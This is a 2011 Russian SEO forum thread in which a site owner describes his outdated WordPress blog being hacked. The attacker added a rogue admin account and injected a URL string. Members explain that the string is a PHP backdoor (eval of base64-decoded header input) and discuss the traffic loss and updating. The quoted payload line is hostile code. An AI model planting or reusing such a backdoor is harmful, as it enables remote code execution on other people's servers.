IPB

Здравствуйте, гость ( Вход | Регистрация )

 
Ответить в данную темуНачать новую тему
 Chingiz.org ломанули
Chin
сообщение 10.1.2011, 14:46
Сообщение #1


Администратор
****

Группа: root
Сообщений: 7813
Регистрация: 17.3.2007
Пользователь №: 1
Вставить ник
Цитата



Сабж. Вроде вредоноса не навешивалось, не наше никаких подгрузок.
Но добавлен был новый (еще один) администратор с мылом johnnybarryca@gmail.com
Также к урлу дописывалась такая вот шняга %&(%7B$%7Beval(base64_decode($_SERVER%5BHTTP_EXECCODE%5D))%7D%7D%7C.+)&%/
Чего она типа должна была сделать я так и не понял.
Вордпресс был старенький, но все равно проверьте ваши блоги (IMG:http://4seo.biz/style_emoticons/default/baaa.gif)
Я уже подчистил бяки и обновился.
Перейти в начало страницы
 
+Цитировать сообщение
Rusl
сообщение 10.1.2011, 15:54
Сообщение #2


Ветеран
****

Группа: Кандидат
Сообщений: 393
Регистрация: 14.5.2007
Из: Украина
Пользователь №: 195
Вставить ник
Цитата



а какая версия стояла?
Перейти в начало страницы
 
+Цитировать сообщение
Chin
сообщение 10.1.2011, 15:59
Сообщение #3


Администратор
****

Группа: root
Сообщений: 7813
Регистрация: 17.3.2007
Пользователь №: 1
Вставить ник
Цитата



Древняя, 2.3.3
Может конечно с соседей по виртуалу залезли, хз. Из вреда получилось, что из-за дописки к урлам этой хуйни сверху всё выпало из индексов к ебеням в яндексе, а в гугле теперь такая вот красивая хуйня с урлами.
Трафика ноль совсем стал. Хорошо хоть ниакое говно никому не подгружалось (IMG:http://4seo.biz/style_emoticons/default/smile.gif)
Перейти в начало страницы
 
+Цитировать сообщение
yadino
сообщение 10.1.2011, 17:33
Сообщение #4


Ветеран
****

Группа: Newsposter
Сообщений: 995
Регистрация: 19.1.2009
Пользователь №: 737
Вставить ник
Цитата



жесть)) вот же хацкеры
Перейти в начало страницы
 
+Цитировать сообщение
Inquisitor
сообщение 10.1.2011, 17:46
Сообщение #5


друг 4seo
****

Группа: Newsposter
Сообщений: 1157
Регистрация: 1.12.2007
Пользователь №: 434
Вставить ник
Цитата



Ну так совсем старая версия! Уязвимостей масса

Вообще надо закрывать /wp-admin/ нахрен
Перейти в начало страницы
 
+Цитировать сообщение
Deschain
сообщение 10.1.2011, 18:17
Сообщение #6


Ветеран
****

Группа: Кандидат
Сообщений: 154
Регистрация: 8.10.2007
Пользователь №: 408
Вставить ник
Цитата



при передаче вредоносного кода в переменной HTTP_EXECCODE он бы выполнился на сервере, а сунуть могли туда всё, что угодно.
Перейти в начало страницы
 
+Цитировать сообщение
Chin
сообщение 12.1.2011, 17:15
Сообщение #7


Администратор
****

Группа: root
Сообщений: 7813
Регистрация: 17.3.2007
Пользователь №: 1
Вставить ник
Цитата



Deschain, т.е. целью были не посетители, а сам хост?
Inquisitor, сам то давно обновлялся? (IMG:http://4seo.biz/style_emoticons/default/baaa.gif)
Перейти в начало страницы
 
+Цитировать сообщение
Deschain
сообщение 12.1.2011, 22:10
Сообщение #8


Ветеран
****

Группа: Кандидат
Сообщений: 154
Регистрация: 8.10.2007
Пользователь №: 408
Вставить ник
Цитата



Chin, сломали, и повесили код, чтобы в любой момент можно было получить доступ к хосту, бэкдор, фактически. Исполнить любой код. А уж для чего - хрен знает. Может ифрейм хотели повесить, или ссылки спамные, или спам с твоего сервака рассылать, или как прокси юзать - варьянтов куча (IMG:http://4seo.biz/style_emoticons/default/smile.gif)
Перейти в начало страницы
 
+Цитировать сообщение
Chin
сообщение 15.1.2011, 16:46
Сообщение #9


Администратор
****

Группа: root
Сообщений: 7813
Регистрация: 17.3.2007
Пользователь №: 1
Вставить ник
Цитата



Понятно. Вот засранцы (IMG:http://4seo.biz/style_emoticons/default/baaa.gif)
Хорошо что не повесили.
Очень по капельке начал трафик возвращаться. Яндекс в базу блог возвращает, гугль прилично страниц с нормальным урлом уже переиндексил.
Перейти в начало страницы
 
+Цитировать сообщение
Chin
сообщение 20.1.2011, 3:38
Сообщение #10


Администратор
****

Группа: root
Сообщений: 7813
Регистрация: 17.3.2007
Пользователь №: 1
Вставить ник
Цитата



Траф подрастает. Таким образом мы стали невольными свидетелями фильтра за урлы с признаками взлома (IMG:http://4seo.biz/style_emoticons/default/wink.gif)
Перейти в начало страницы
 
+Цитировать сообщение
null
сообщение 20.1.2011, 7:49
Сообщение #11


Ветеран
****

Группа: Кандидат
Сообщений: 634
Регистрация: 19.10.2008
Пользователь №: 670
Вставить ник
Цитата



Ну гугл давно борецца, их Safe Browsing.
Перейти в начало страницы
 
+Цитировать сообщение
Sebastano Perero
сообщение 20.1.2011, 8:31
Сообщение #12


Ветеран
****

Группа: Кандидат
Сообщений: 1158
Регистрация: 11.9.2008
Из: Козолупы
Пользователь №: 636
Вставить ник
Цитата



Суки, блядь ........ чтоб у них хуй отсох.
Перейти в начало страницы
 
+Цитировать сообщение
Inquisitor
сообщение 23.1.2011, 15:44
Сообщение #13


друг 4seo
****

Группа: Newsposter
Сообщений: 1157
Регистрация: 1.12.2007
Пользователь №: 434
Вставить ник
Цитата



Цитата(Chin @ 12.1.2011, 17:56) *
Deschain, т.е. целью были не посетители, а сам хост?
Inquisitor, сам то давно обновлялся? (IMG:http://4seo.biz/style_emoticons/default/baaa.gif)


Старюсь всегда обновляться, когда stable версия выходит (IMG:http://4seo.biz/style_emoticons/default/russian_ru.gif)
Перейти в начало страницы
 
+Цитировать сообщение
Chin
сообщение 25.1.2011, 7:21
Сообщение #14


Администратор
****

Группа: root
Сообщений: 7813
Регистрация: 17.3.2007
Пользователь №: 1
Вставить ник
Цитата



Цитата(null @ 20.1.2011, 10:00) *
Ну гугл давно борецца, их Safe Browsing.

Вроде мой поломатый не кидал на сейф броузинг, просто вес потерялся у страниц полностью из-за новых урлов, да еще и с признаками взлома, вот из серпов по нч и выпало всё нахуй.

Seba, угу, и отвалился в унитаз, когда они воду спускать будут (IMG:http://4seo.biz/style_emoticons/default/baaa.gif)
Перейти в начало страницы
 
+Цитировать сообщение
Inquisitor
сообщение 25.1.2011, 15:17
Сообщение #15


друг 4seo
****

Группа: Newsposter
Сообщений: 1157
Регистрация: 1.12.2007
Пользователь №: 434
Вставить ник
Цитата



кста сейчас ставлю блоги через сиплскрипт и обновляю так же
удобно когда их много
Перейти в начало страницы
 
+Цитировать сообщение
Chin
сообщение 31.1.2011, 6:03
Сообщение #16


Администратор
****

Группа: root
Сообщений: 7813
Регистрация: 17.3.2007
Пользователь №: 1
Вставить ник
Цитата



Что за сиплскрипт? Сиплер что-то написал? (IMG:http://4seo.biz/style_emoticons/default/baaa.gif)
Перейти в начало страницы
 
+Цитировать сообщение

Ответить в данную темуНачать новую тему
2 чел. читают эту тему (гостей: 2, скрытых пользователей: 0)
Пользователей: 0

 



RSS Текстовая версия Сейчас: 18.6.2018, 3:52